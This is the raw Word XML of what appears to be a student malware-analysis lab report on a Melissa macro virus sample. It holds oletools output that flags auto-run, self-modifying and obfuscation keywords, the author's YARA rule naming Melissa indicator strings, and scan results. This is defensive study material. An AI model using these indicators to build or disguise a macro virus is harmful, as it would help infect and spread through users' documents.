          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sample_lab6_18_sep</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 OLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> stream: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>'Macros/VBA/Melissa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D6739F"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
    <w:p w14:paraId="0F1E4EFD"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VBA MACRO </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>VBA_P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-code.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C90A8B"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in file: VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>P</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code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 OLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> stream: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>'VBA P-code'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A626AC"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
    <w:p w14:paraId="48268CD2"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|Type      |Keyword             |Description                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F52358"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
    <w:p w14:paraId="1C598C49"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|AutoExec  |Document_Close      |Runs when the Word document is closed        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32679188"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|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46CD0C"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|opened                                       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19351982"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CreateObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>        |May create an OLE object                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25204308"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|Suspicious|VBProject           |May attempt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 modify the VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>code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self</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B8433A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7E02F"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|Suspicious|VBComponents        |May attempt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 modify the VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>code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self</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64605C4A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC16E67"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|Suspicious|CodeModule          |May attempt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 modify the VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>code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self</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB5585C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B8D53"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|Suspicious|AddFromString       |May attempt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 modify the VBA </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>code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self</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398310"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w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165FBD2"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|Suspicious|System              |May run an executable file or a system       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A5632"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|command on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mac</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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> combined </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30498AC4"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lastRenderedPageBreak/>
        <w:t>|          |                    |libc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>dylib</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D54E7"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|Suspicious|Base64 Strings      |</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Base64</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encoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> strings were detected,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> may</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> be |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678ED145"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|used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 obfuscate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>strings</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option</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decode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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFF3C79"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|see </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>)                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BFEA31"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|Suspicious|VBA Stomping        |VBA Stomping was </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>detected</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>: the VBA source    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B881392"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|code and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>P</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code</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> are different,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> this</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> may have |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E63A39B"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|been used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 hide malicious code             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F882370"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
    <w:p w14:paraId="44C44705"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VBA Stomping detection is experimental: please report any</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> false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positive</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negative</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> at https://github.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A364DB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>com</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decalage2</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oletools</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issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105321C" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="00A364DB"/>
    <w:p w14:paraId="6E7C2919" w14:textId="6EBC387E" w:rsidR="009E2FD7" w:rsidRDefault="009E2FD7" w:rsidP="007F0128"/>
    <w:p w14:paraId="45D0236C" w14:textId="4AC5AB4B" w:rsidR="00A364DB" w:rsidRDefault="00A364DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E057E0" w14:textId="77777777" w:rsidR="00A364DB" w:rsidRDefault="00A364DB" w:rsidP="007F0128"/>
    <w:p w14:paraId="6AAA9479" w14:textId="32671CA7" w:rsidR="009E2FD7" w:rsidRDefault="009E2FD7" w:rsidP="007F0128">
      <w:r>
        <w:t>My yara rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1966EE" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>rule melissascan{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E94DA" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve"> meta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1213F" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      description = "Lab6 - file sample_lab6_18_sep"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95549E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      date = "2021-09-18"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DBE613" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      hash1 = "b3d734f08b01361edce0bde55f3b21b7befcdcf7fb442789098e8614c67fcdbf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1634FA" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061"/>
    <w:p w14:paraId="00FB3F01" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACB738" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDBF7B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $s1 = "password " fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A79259" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $s2 = ".Log`on \"p" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A630CE" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $s3 = "ToInfect" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB2BD2" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD0117" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $key1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF951D" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $key2 = "Kwyjibo" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68577F" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $key3 = "Melissa" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F17470" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480CA33C" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $fun1 = "GetNameSpaceC" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF17A1" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $fun2 = "Private Sub Document_Open()" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A455E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">      $fun3 = "Private Sub Document_Close()" fullword ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6404BC" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061"/>
    <w:p w14:paraId="2116751E" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">   condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7597CB0C" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t xml:space="preserve">    2 of ($s*) and 2 of ($key*) and  2 of ($fun*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5592AE" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061"/>
    <w:p w14:paraId="51700C9B" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD3FF2" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFEB8C" w14:textId="52A07B76" w:rsidR="00A364DB" w:rsidRDefault="00351DDF" w:rsidP="00A20061">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E837B5" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>C:\Users\Hakka\Desktop\MalwareAnalysisLab\Lab6+&gt;yara32 -s melissascan.yara C:\Users\Hakka\Desktop\MalwareAnalysisLab\Lab6\Samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ADE4CA" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>melissascan C:\Users\Hakka\Desktop\MalwareAnalysisLab\Lab6\Samples\sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EC690" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x8bd3:$s1: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C847075" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0x95fd:$s2: .Log`on "p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB12F2" w14:textId="77777777" w:rsidR="00A20061" w:rsidRDefault="00A20061" w:rsidP="00A20061">
      <w:r>
        <w:t>0xa86f:$s3: ToInfect</w:t>
      </w:r>
    </w:p>
